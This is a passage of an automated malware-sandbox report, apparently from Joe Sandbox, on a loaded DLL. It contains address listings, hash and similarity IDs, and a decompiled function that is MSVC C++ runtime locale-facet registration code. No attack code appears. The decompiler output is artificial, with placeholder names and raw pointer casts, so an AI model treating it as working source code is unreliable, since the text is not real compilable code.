                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3
                          0x6e20f326
                          0x6e20f326
                          0x6e20f329
                          0x6e20f32d
                          0x6e20f331
                          0x6e20f33e
                          0x6e20f346
                          0x6e20f348
                          0x00000000
                          0x6e20f348
                          0x6e20f30f
                          0x6e20f30f
                          0x00000000
                          0x6e20f30f
                          0x6e20f30d
                          0x6e20f280
                          0x6e20f280
                          0x6e20f283
                          0x6e20f287
                          0x6e20f28b
                          0x6e20f298
                          0x6e20f2a0
                          0x6e20f2a2
                          0x00000000
                          0x6e20f2a2
                          0x6e20f269
                          0x6e20f269
                          0x00000000
                          0x6e20f269
                          0x6e20f267
                          0x6e20f1da
                          0x6e20f1da
                          0x6e20f1dd
                          0x6e20f1e1
                          0x6e20f1e5
                          0x6e20f1f2
                          0x6e20f1fa
                          0x6e20f1fc
                          0x00000000
                          0x6e20f1fc
                          0x6e20f1c3
                          0x6e20f1c3
                          0x00000000
                          0x6e20f1c3
                          0x6e20f1c1
                          0x6e20f134
                          0x6e20f134
                          0x6e20f137
                          0x6e20f13b
                          0x6e20f13f
                          0x6e20f14c
                          0x6e20f154
                          0x6e20f156
                          0x00000000
                          0x6e20f156
                          0x6e20f11d
                          0x6e20f11d
                          0x00000000
                          0x6e20f11d
                          0x6e20f11b
                          0x6e20f08e
                          0x6e20f08e
                          0x6e20f091
                          0x6e20f095
                          0x6e20f099
                          0x6e20f0a6
                          0x6e20f0ae
                          0x6e20f0b0
                          0x00000000
                          0x6e20f0b0
                          0x6e20f077
                          0x6e20f077
                          0x00000000
                          0x6e20f077
                          0x6e20f075
                          0x6e20efe8
                          0x6e20efe8
                          0x6e20efeb
                          0x6e20efef
                          0x6e20eff3
                          0x6e20f000
                          0x6e20f008
                          0x6e20f00a
                          0x00000000
                          0x6e20f00a
                          0x6e20efd1
                          0x6e20efd1
                          0x00000000
                          0x6e20efd1
                          0x6e20efcf
                          0x6e20ef42
                          0x6e20ef42
                          0x6e20ef45
                          0x6e20ef49
                          0x6e20ef4d
                          0x6e20ef5a
                          0x6e20ef62
                          0x6e20ef64
                          0x00000000
                          0x6e20ef64
                          0x6e20ef2b
                          0x6e20ef2b
                          0x00000000
                          0x6e20ef2b
                          0x6e20ef29

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20EEF2
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20EEFC
                          • int.LIBCPMT ref: 6E20EF13
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • codecvt.LIBCPMT ref: 6E20EF36
                          • std::_Facet_Register.LIBCPMT ref: 6E20EF4D
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20EF6D
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20EF8B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
                          • String ID: 0k,n
                          • API String ID: 2594415655-114697357
                          • Opcode ID: 8b756e5784a4f5490271d43bef1c0ecc3b16846255bc20116ac77fd3c7765d7a
                          • Instruction ID: 5986fe8daf7e90926c789368786eb62b9e312487daab31bd92e13b7db7bf81cc
                          • Opcode Fuzzy Hash: 8b756e5784a4f5490271d43bef1c0ecc3b16846255bc20116ac77fd3c7765d7a
                          • Instruction Fuzzy Hash: 9C11E375A1091ECBCF00EBE0C898AEDB77BAF44714F140909E4107B2D0DBB49E80CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F6B3, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20F6B3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t153;
				signed int _t154;
				void* _t166;
				void* _t179;
				void* _t192;
				void* _t205;
				void* _t218;
				void* _t231;
				void* _t244;
				void* _t257;
				void* _t270;
				signed int _t397;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				void* _t462;

				_t428 = __edx;
				_t327 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t462 - 0x14, 0);
				_t441 =  *0x6e2c6dc8; // 0x0
				 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
				 *(_t462 - 0x10) = _t441;
				_t153 = E6E1E161C(0x6e2c6d7c);
				_t330 =  *((intOrPtr*)(_t462 + 8));
				_t154 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t153);
				_t430 = _t154;
				if(_t154 != 0) {
					L5:
					E6E2066BA(_t462 - 0x14);
					return E6E220075(_t430);
				} else {
					if(_t441 == 0) {
						_push( *((intOrPtr*)(_t462 + 8)));
						_push(_t462 - 0x10);
						__eflags = E6E211230(__ebx, _t330, __edx, _t430, _t441) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t462 - 0x20);
							E6E223D74(_t462 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t430, _t441, 0x14);
							E6E206653(_t462 - 0x14, 0);
							_t442 =  *0x6e2c6dc4; // 0x0
							 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
							 *(_t462 - 0x10) = _t442;
							_t166 = E6E1E161C(0x6e2c6d78);
							_t337 =  *((intOrPtr*)(_t462 + 8));
							_t431 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t166);
							__eflags = _t431;
							if(_t431 != 0) {
								L12:
								E6E2066BA(_t462 - 0x14);
								return E6E220075(_t431);
							} else {
								__eflags = _t442;
								if(_t442 == 0) {
									_push( *((intOrPtr*)(_t462 + 8)));
									_push(_t462 - 0x10);
									__eflags = E6E2112B4(_t327, _t337, __edx, _t431, _t442) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t462 - 0x20);
										E6E223D74(_t462 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t327, _t431, _t442, 0x14);
										E6E206653(_t462 - 0x14, 0);
										_t443 =  *0x6e2c6dd8; // 0x0
										 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
										 *(_t462 - 0x10) = _t443;
										_t179 = E6E1E161C(0x6e2c6d84);
										_t344 =  *((intOrPtr*)(_t462 + 8));
										_t432 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t179);
										__eflags = _t432;
										if(_t432 != 0) {
											L19:
											E6E2066BA(_t462 - 0x14);
											return E6E220075(_t432);
										} else {
											__eflags = _t443;
											if(_t443 == 0) {
												_push( *((intOrPtr*)(_t462 + 8)));
												_push(_t462 - 0x10);
												__eflags = E6E211339(_t327, _t344, __edx, _t432, _t443) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t462 - 0x20);
													E6E223D74(_t462 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t327, _t432, _t443, 0x14);
													E6E206653(_t462 - 0x14, 0);
													_t444 =  *0x6e2c6db0; // 0x0
													 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
													 *(_t462 - 0x10) = _t444;
													_t192 = E6E1E161C(0x6e2c6d64);
													_t351 =  *((intOrPtr*)(_t462 + 8));
													_t433 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t192);
													__eflags = _t433;
													if(_t433 != 0) {
														L26:
														E6E2066BA(_t462 - 0x14);
														return E6E220075(_t433);
													} else {
														__eflags = _t444;
														if(_t444 == 0) {
															_push( *((intOrPtr*)(_t462 + 8)));
															_push(_t462 - 0x10);
															__eflags = E6E2113A1(_t327, _t351, _t428, _t433, _t444) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t462 - 0x20);
																E6E223D74(_t462 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t327, _t433, _t444, 0x14);
																E6E206653(_t462 - 0x14, 0);
																_t445 =  *0x6e2c6ddc; // 0x0
																 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																 *(_t462 - 0x10) = _t445;
																_t205 = E6E1E161C(0x6e2c6d88);
																_t358 =  *((intOrPtr*)(_t462 + 8));
																_t434 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t205);
																__eflags = _t434;
																if(_t434 != 0) {
																	L33:
																	E6E2066BA(_t462 - 0x14);
																	return E6E220075(_t434);
																} else {
																	__eflags = _t445;
																	if(_t445 == 0) {
																		_push( *((intOrPtr*)(_t462 + 8)));
																		_push(_t462 - 0x10);
																		__eflags = E6E211409(_t327, _t358, _t428, _t434, _t445) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t462 - 0x20);
																			E6E223D74(_t462 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t327, _t434, _t445, 0x14);
																			E6E206653(_t462 - 0x14, 0);
																			_t446 =  *0x6e2c6de0; // 0x0
																			 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																			 *(_t462 - 0x10) = _t446;
																			_t218 = E6E1E161C(0x6e2c6d8c);
																			_t365 =  *((intOrPtr*)(_t462 + 8));
																			_t435 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t218);
																			__eflags = _t435;
																			if(_t435 != 0) {
																				L40:
																				E6E2066BA(_t462 - 0x14);
																				return E6E220075(_t435);
																			} else {
																				__eflags = _t446;
																				if(_t446 == 0) {
																					_push( *((intOrPtr*)(_t462 + 8)));
																					_push(_t462 - 0x10);
																					__eflags = E6E211471(_t327, _t365, _t428, _t435, _t446) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t462 - 0x20);
																						E6E223D74(_t462 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t327, _t435, _t446, 0x14);
																						E6E206653(_t462 - 0x14, 0);
																						_t447 =  *0x6e2c6dfc; // 0x0
																						 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																						 *(_t462 - 0x10) = _t447;
																						_t231 = E6E1E161C(0x6e2c6da8);
																						_t372 =  *((intOrPtr*)(_t462 + 8));
																						_t436 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t231);
																						__eflags = _t436;
																						if(_t436 != 0) {
																							L47:
																							E6E2066BA(_t462 - 0x14);
																							return E6E220075(_t436);
																						} else {
																							__eflags = _t447;
																							if(_t447 == 0) {
																								_push( *((intOrPtr*)(_t462 + 8)));
																								_push(_t462 - 0x10);
																								__eflags = E6E2114EC(_t327, _t372, _t428, _t436, _t447) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t462 - 0x20);
																									E6E223D74(_t462 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t327, _t436, _t447, 0x14);
																									E6E206653(_t462 - 0x14, 0);
																									_t448 =  *0x6e2c6dcc; // 0x0
																									 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																									 *(_t462 - 0x10) = _t448;
																									_t244 = E6E1E161C(0x6e2c6d80);
																									_t379 =  *((intOrPtr*)(_t462 + 8));
																									_t437 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t244);
																									__eflags = _t437;
																									if(_t437 != 0) {
																										L54:
																										E6E2066BA(_t462 - 0x14);
																										return E6E220075(_t437);
																									} else {
																										__eflags = _t448;
																										if(_t448 == 0) {
																											_push( *((intOrPtr*)(_t462 + 8)));
																											_push(_t462 - 0x10);
																											__eflags = E6E211558(_t327, _t379, _t428, _t437, _t448) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t462 - 0x20);
																												E6E223D74(_t462 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t327, _t437, _t448, 0x14);
																												E6E206653(_t462 - 0x14, 0);
																												_t449 =  *0x6e2c6e00; // 0x0
																												 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																												 *(_t462 - 0x10) = _t449;
																												_t257 = E6E1E161C(0x6e2c6dac);
																												_t386 =  *((intOrPtr*)(_t462 + 8));
																												_t438 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t257);
																												__eflags = _t438;
																												if(_t438 != 0) {
																													L61:
																													E6E2066BA(_t462 - 0x14);
																													return E6E220075(_t438);
																												} else {
																													__eflags = _t449;
																													if(_t449 == 0) {
																														_push( *((intOrPtr*)(_t462 + 8)));
																														_push(_t462 - 0x10);
																														__eflags = E6E2115C4(_t327, _t386, _t428, _t438, _t449) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t462 - 0x20);
																															E6E223D74(_t462 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t327, _t438, _t449, 0x14);
																															E6E206653(_t462 - 0x14, 0);
																															_t450 =  *0x6e2c6dd0; // 0x0
																															 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																															 *(_t462 - 0x10) = _t450;
																															_t270 = E6E1E161C(0x6e2c6d60);
																															_t393 =  *((intOrPtr*)(_t462 + 8));
																															_t439 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t270);
																															__eflags = _t439;
																															if(_t439 != 0) {
																																L68:
																																E6E2066BA(_t462 - 0x14);
																																return E6E220075(_t439);
																															} else {
																																__eflags = _t450;
																																if(_t450 == 0) {
																																	_push( *((intOrPtr*)(_t462 + 8)));
																																	_push(_t462 - 0x10);
																																	__eflags = E6E21162A(_t327, _t393, _t428, _t439, _t450) - 0xffffffff;
																																	if(__eflags == 0) {
																																		_t397 = _t462 - 0x20;
																																		E6E1E1438(_t397);
																																		E6E223D74(_t462 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e26851f, _t327, _t439, _t450, 4);
																																		_t451 = _t397;
																																		 *(_t462 - 0x10) = _t451;
																																		 *((intOrPtr*)(_t451 + 4)) =  *((intOrPtr*)(_t462 + 0xc));
																																		_push( *((intOrPtr*)(_t462 + 0x14)));
																																		_t147 = _t462 - 4;
																																		 *_t147 =  *(_t462 - 4) & 0x00000000;
																																		__eflags =  *_t147;
																																		 *_t451 = 0x6e26c0c4;
																																		 *((char*)(_t451 + 0x28)) =  *((intOrPtr*)(_t462 + 0x10));
																																		E6E21542F(_t327, _t397, _t428, _t439, _t451,  *_t147);
																																		return E6E220075(_t451,  *((intOrPtr*)(_t462 + 8)));
																																	} else {
																																		_t439 =  *(_t462 - 0x10);
																																		 *(_t462 - 0x10) = _t439;
																																		 *(_t462 - 4) = 1;
																																		E6E206FD3(__eflags, _t439);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t439 + 4))))();
																																		 *0x6e2c6dd0 = _t439;
																																		goto L68;
																																	}
																																} else {
																																	_t439 = _t450;
																																	goto L68;
																																}
																															}
																														} else {
																															_t438 =  *(_t462 - 0x10);
																															 *(_t462 - 0x10) = _t438;
																															 *(_t462 - 4) = 1;
																															E6E206FD3(__eflags, _t438);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t438 + 4))))();
																															 *0x6e2c6e00 = _t438;
																															goto L61;
																														}
																													} else {
																														_t438 = _t449;
																														goto L61;
																													}
																												}
																											} else {
																												_t437 =  *(_t462 - 0x10);
																												 *(_t462 - 0x10) = _t437;
																												 *(_t462 - 4) = 1;
																												E6E206FD3(__eflags, _t437);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t437 + 4))))();
																												 *0x6e2c6dcc = _t437;
																												goto L54;
																											}
																										} else {
																											_t437 = _t448;
																											goto L54;
																										}
																									}
																								} else {
																									_t436 =  *(_t462 - 0x10);
																									 *(_t462 - 0x10) = _t436;
																									 *(_t462 - 4) = 1;
																									E6E206FD3(__eflags, _t436);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t436 + 4))))();
																									 *0x6e2c6dfc = _t436;
																									goto L47;
																								}
																							} else {
																								_t436 = _t447;
																								goto L47;
																							}
																						}
																					} else {
																						_t435 =  *(_t462 - 0x10);
																						 *(_t462 - 0x10) = _t435;
																						 *(_t462 - 4) = 1;
																						E6E206FD3(__eflags, _t435);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t435 + 4))))();
																						 *0x6e2c6de0 = _t435;
																						goto L40;
																					}
																				} else {
																					_t435 = _t446;
																					goto L40;
																				}
																			}
																		} else {
																			_t434 =  *(_t462 - 0x10);
																			 *(_t462 - 0x10) = _t434;
																			 *(_t462 - 4) = 1;
																			E6E206FD3(__eflags, _t434);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t434 + 4))))();
																			 *0x6e2c6ddc = _t434;
																			goto L33;
																		}
																	} else {
																		_t434 = _t445;
																		goto L33;
																	}
																}
															} else {
																_t433 =  *(_t462 - 0x10);
																 *(_t462 - 0x10) = _t433;
																 *(_t462 - 4) = 1;
																E6E206FD3(__eflags, _t433);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t433 + 4))))();
																 *0x6e2c6db0 = _t433;
																goto L26;
															}
														} else {
															_t433 = _t444;
															goto L26;
														}
													}
												} else {
													_t432 =  *(_t462 - 0x10);
													 *(_t462 - 0x10) = _t432;
													 *(_t462 - 4) = 1;
													E6E206FD3(__eflags, _t432);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t432 + 4))))();
													 *0x6e2c6dd8 = _t432;
													goto L19;
												}
											} else {
												_t432 = _t443;
												goto L19;
											}
										}
									} else {
										_t431 =  *(_t462 - 0x10);
										 *(_t462 - 0x10) = _t431;
										 *(_t462 - 4) = 1;
										E6E206FD3(__eflags, _t431);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t431 + 4))))();
										 *0x6e2c6dc4 = _t431;
										goto L12;
									}
								} else {
									_t431 = _t442;
									goto L12;
								}
							}
						} else {
							_t430 =  *(_t462 - 0x10);
							 *(_t462 - 0x10) = _t430;
							 *(_t462 - 4) = 1;
							E6E206FD3(__eflags, _t430);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t430 + 4))))();
							 *0x6e2c6dc8 = _t430;
							goto L5;
						}
					} else {
						_t430 = _t441;
						goto L5;
					}
				}
			}




































                          0x6e20f6b3
                          0x6e20f6b3
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e4
                          0x6e20f6e9
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
